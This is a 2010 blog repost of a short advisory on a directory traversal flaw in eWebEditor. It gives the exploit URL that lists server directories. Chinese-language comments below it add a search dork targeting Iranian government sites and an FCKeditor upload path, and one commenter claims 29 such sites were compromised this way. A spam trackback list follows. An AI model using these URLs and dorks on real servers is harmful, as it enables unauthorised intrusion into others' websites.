RSS

eWebEditor suffers from a directory traversal vulnerability

This entry was posted on Jan 31 2010

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: all version
#################################################################
# Vulnerability Info:
# Type: Directory Traversal
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################

Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


35 Responses to “eWebEditor suffers from a directory traversal vulnerability”

  1. 擦……这哪是伊朗人发现的。明明他们是这么被日的可好。前些日子我那哥们给我三个tip玩
    tip1:[To Parent Directory] inurl:.gov.ir/
    tip2:网站域名/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php、aspx、jsp自己看网站环境选/connector.aspx、php、jsp自己选
    tip3:上传失败用upload.asp?id=16&d_viewmode=&dir =./..厉遍目录找后台

    st0p Reply:

    唉,有点郁闷,不少人在转这个东西。
    现在在网上想找到原作者有点难吧。郁闷。。


  2. 当时搜出来的29个.gov.ir都遭到毒手,就是这3个tip


  1. 32 Trackback(s)

  2. foundation repairs in Goodwins Corner IN
  3. Loreal professional hair color
  4. Free Psychic Reading
  5. cricut cartridges
  6. Healthy Choice coupon
  7. PDAs
  8. home improvement
  9. Chapter13 Illinois
  10. dove coupons
  11. government grants
  12. online public relations
  13. Carrier Parts
  14. roofing contractors Pleasant Hills OH
  15. Warlock
  16. my url
  17. delete fan facebook
  18. roofing in Enumclaw WA
  19. extraction thimbles
  20. deportiva
  21. portarollo
  22. Filter paper
  23. amazon is my niche Keyword.
  24. tanie czytanie
  25. http://wallinside.com/post-1253448.html
  26. Reifen
  27. law firm in Long Island, NY
  28. chicago limo service
  29. Alpha Warranty
  30. Top Penny Stocks
  31. Domain Brokerage
  32. loss of amenity
  33. supermarket injury

You must be logged in to post a comment.